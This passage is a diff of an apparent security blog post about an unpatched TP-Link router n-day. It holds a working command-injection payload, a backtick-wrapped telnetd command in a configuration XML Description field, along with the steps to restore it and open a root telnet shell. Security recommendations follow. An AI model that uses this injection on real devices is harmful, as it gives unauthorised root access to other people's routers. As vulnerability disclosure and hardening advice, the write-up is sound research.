0xf15h/0xf15h.github.io/_posts/2021-05-07-tp-link-gdpr.md

 #
 # After
 #
-# <Description val="AC750 Wireless Dual Band Router`ping 192.168.0.100`" />
+# <Description val="AC750 Wireless Dual Band Router`telnetd -p 1023 -l login` " />
 python3 tpconf_bin_xml.py -l ArcherC20V520121442010n.xml ArcherC20V520121442010n.payload.bin
 # Then using the web interface, restore the ArcherC20V520121442010n.payload.bin config
 telnet 192.168.0.1 1023
 # Username: admin
 # Password: 1234
 ```

-- Now we have a remote root shell!
-- It's pretty depressing that this n-day has been on GitHub for three years and still isn't patched on firmware that was updated on 1/27/2021
-- I hope TP-Link eventually gets around to patching it across any or all device models
+Now we have a remote root shell!
+It's pretty depressing that this n-day has been on GitHub for three years and still isn't patched on firmware that was updated on 1/27/2021.
+I hope TP-Link eventually gets around to patching it across any or all device models.

 ## Security Recommendations

-### Default RSA Key
+- Use cryptographically strong entropy from a crypto API when generating AES keys [[link]](https://developer.mozilla.org/en-US/docs/Web/API/Crypto)

-- Generate the RSA public/private key-pair during httpd initialization, which will occur on boot
-- If any malloc in generate_rsa_private_key fails, consider it an unrecoverable error and force httpd to exit
+- Generate the RSA public/private key-pair during the web server initialization on boot.
+If any malloc in `generate_rsa_private_key` fails, consider it an unrecoverable error and force the web server to exit.
+- Use PKCS#1 padding when using RSA
+- Do not modify the sequence entropy value to mitigate replay attacks
+- Patch open source n-days